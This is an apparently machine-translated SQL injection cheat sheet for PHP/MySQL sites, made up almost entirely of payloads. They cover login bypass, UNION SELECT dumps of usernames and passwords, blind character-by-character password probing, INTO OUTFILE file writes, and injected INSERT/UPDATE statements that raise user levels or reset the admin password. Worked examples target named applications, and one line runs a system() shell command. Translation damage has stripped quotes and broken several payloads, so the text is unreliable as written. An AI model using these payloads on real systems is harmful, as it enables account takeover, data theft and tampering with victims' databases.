Php Injection library Summary

Or 1 = 1
Or 1 = 1
/*
% 23
And password = mypass
Id =-1 union select 1, 1
Id =-1 union select char (97), char (97), char (97)
Id = 1 union select 1, 1 from members
Id = 1 union select 1, 1 from admin
Id = 1 union select 1, 1 from user
Userid = 1 and password = mypass
Userid = 1 and mid (password, 112) = char)
Userid = 1 and mid (password, 4, 1) = char (97)
And ord (mid (password, 111)> (the ord function is very useful and can return an integer)
And LENGTH (password) = 6 (LENGTH of the probe password)
And LEFT (password, 1) = m
And LEFT (password, 2) = my
...................... And so on
Union select 1, username, password from user /*
Union select 1, username, password from user /*
= Union select 1, username, password from user/* (can be 1 or = followed directly)
99999 union select 1, username, password from user /*
Into outfile c:/file.txt (export file)
= Or 1 = 1 into outfile c:/file.txt
1 union select 1, username, password from user into outfile c:/user.txt
SELECT password FROM admins WHERE login = John into dumpfile/path/to/site/file.txt
Id = union select 1, username, password from user into outfile
Id =-1 union select 1, database (), version () (flexible application query)
Commonly used query test statement,
SELECT * FROM table WHERE 1 = 1
SELECT * FROM table WHERE uuu = uuu
SELECT * FROM table WHERE 1 <> 2
SELECT * FROM table WHERE 3> 2
SELECT * FROM table WHERE 2 <3
SELECT * FROM table WHERE 1
SELECT * FROM table WHERE 1 + 1
SELECT * FROM table WHERE 1--1
SELECT * FROM table where isnull (NULL)
SELECT * FROM table where isnull (COT (0 ))
SELECT * FROM table WHERE 1 IS NOT NULL
SELECT * FROM table WHERE NULL IS NULL
SELECT * FROM table WHERE 2 BETWEEN 1 AND 3
SELECT * FROM table WHERE B BETWEEN a AND c
SELECT * FROM table WHERE 2 IN (0, 1, 2)
SELECT * FROM table where case when 1> 0 THEN 1 END

For example, the night cat Download System Version 1.0
Id = 1 union select, 1
Union select, 1 from ymdown_user
Union select 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1 from ymdown_user where id = 1
Id = 10000 union select, 1 from ymdown_user where id = 1 and groupid = 1
Union select 1, username, 1, password, 1 from ymdown_user where id = 1 (replace, look for a password)
Union select, 1 from ymdown_user where id = 1 and ord (mid (password )) = 49 (verify the First password)
Union select, 1 from ymdown_user where id = 1 and ord (mid (password )) = 50 (second digit)
Union select, 1 from ymdown_user where id = 1 and ord (mid (password,) = 51
........................................ ..........................

Example 2: gray track transformation id test (meteor)
Union % 20 (SELECT % 20 allowsmilies, public, userid, 0000-0-0, user (), version () % 20 FROM % 20calendar_events % 20 WHERE % 20 eventid % 20 = % 2013) % 20 order % 20by % 20 eventdate
Union % 20 (SELECT % 20 allowsmilies, public, userid, 0000-0-0, pass (), version () % 20 FROM % 20calendar_events % 20 WHERE % 20 eventid % 20 = % 2010) % 20 order % 20by % 20 eventdate
Construction statement:
SELECT allowsmilies, public, userid, eventdate, event, subject FROM calendar_events WHERE eventid = 1 union (select 1, 1, 1, 1, 1 from user where userid = 1)
SELECT allowsmilies, public, userid, eventdate, event, subject FROM calendar_events WHERE eventid = 1 union (select 1, 1, 1, 1, username, password from user where userid = 1)
UNION % 20 (SELECT % ,,0, 205-01-01, a, password % 20 FROM % 20 user % 20 WHERE % 20 userid % 20 = %) % 20 order % 20by % 20 eventdate
UNION % 20 (SELECT % ,,0, 12695, 1999-01-01, a, password % 20 FROM % 20 user % 20 WHERE % 20 userid = 13465) % 20 order % 20by % 20 eventdate
UNION % 20 (SELECT % ,,0, 12695, 1999-01-01, a, userid % 20 FROM % 20 user % 20 WHERE % 20 username = sandflee) % 20 order % 20by % 20 eventdate (check the sand id)

 

(SELECT a FROM table_name WHERE a = 10 and B = 1 ORDER BY a LIMIT 10)
SELECT * FROM article WHERE articleid = $ id union select * FROM... (when fields are the same as databases, you can directly submit them)
SELECT * FROM article WHERE articleid = $ id union select, 1 FROM ...... (in different cases)

Special tips: Write in forms, search engines, and other places:
"___"
".__"
"%
% Order by articleid /*
% Order by articleid #
_ Order by articleid /*
_ Order by articleid #

$ Command = "dir c:"; system ($ command );
SELECT * FROM article WHERE articleid = $ id
SELECT * FROM article WHERE articleid = $ id
1 and 1 = 2 union select * from user where userid = 1 /*
(SELECT * FROM article WHERE articleid = 1 and 1 = 2 union select * from user where userid = 1 /*)
1 and 1 = 2 union select * from user where userid = 1

Statement format: Create a database, insert:
Create database 'inobjection'
Create table 'user '(
'Userid' int (11) not null auto_increment,
'Username' varchar (20) not null default,
'Password' varchar (20) not null default,
Primary key ('userid ')
);
Insert into 'user' VALUES (1, swap, mypass );

Insert as a registered user:
Insert into 'user' (userid, username, password, homepage, userlevel) VALUES (, $ username, $ password, $ homepage, 1 );
"Insert into membres (login, password, nom, email, userlevel) VALUES ($ login, $ pass, $ nom, $ email, 1 )";
Insert into membres (login, password, nom, email, userlevel) VALUES (, 3) #, 1)
"Insert into membres SET login = $ login, password = $ pass, nom = $ nom, email = $ email ";
Insert into membres SET login =, password =, nom =, userlevel = 3, email =
"Insert into membres VALUES ($ id, $ login, $ pass, $ nom, $ email, 1 )";

UPDATE user SET password = $ password, homepage = $ homepage WHERE id = $ id
UPDATE user SET password = MD5 (mypass) WHERE username = admin #), homepage = $ homepage WHERE id = $ id
"UPDATE membres SET password = $ pass, nom = $ nom, email = $ email WHERE id = $ id ";
UPDATE membres SET password = [PASS], nom =, userlevel = 3, email = WHERE id = [ID]
"UPDATE news SET Votes = Votes + 1, score = score + $ note WHERE idnews = $ id ";

Extended functions:
DATABASE ()
USER ()
SYSTEM_USER ()
SESSION_USER ()
CURRENT_USER ()
For example:
UPDATE article SET title = $ title WHERE articleid = 1 corresponding function
UPDATE article SET title = DATABASE () WHERE id = 1
# Update the current database name to the title Field
UPDATE article SET title = USER () WHERE id = 1
# Update the current MySQL user name to the title Field
UPDATE article SET title = SYSTEM_USER () WHERE id = 1
# Update the current MySQL user name to the title Field
UPDATE article SET title = SESSION_USER () WHERE id = 1
# Update the current MySQL user name to the title Field
UPDATE article SET title = CURRENT_USER () WHERE id = 1
# Update the authenticated username of the current session to the title field.

:::::::::::::::::::::::::::::::::::::::: :::::::::::::::::::::::::::::::::::
$ Req = "SELECT * FROM membres WHERE name LIKE % $ search % order by name ";
SELECT * FROM membres WHERE name LIKE % order by uid # % order by name
SELECT * FROM membres WHERE name LIKE % order by uid # % order by name
SELECT uid FROM admins WHERE login = OR a = a AND password = OR a = a (Classic)
SELECT uid FROM admins WHERE login = OR admin_level = 1 # AND password =
SELECT * FROM table WHERE msg LIKE % hop
SELECT uid FROM membres WHERE login = Bob AND password LIKE a % # AND password =
SELECT * FROM membres WHERE name LIKE % order by uid # % order by name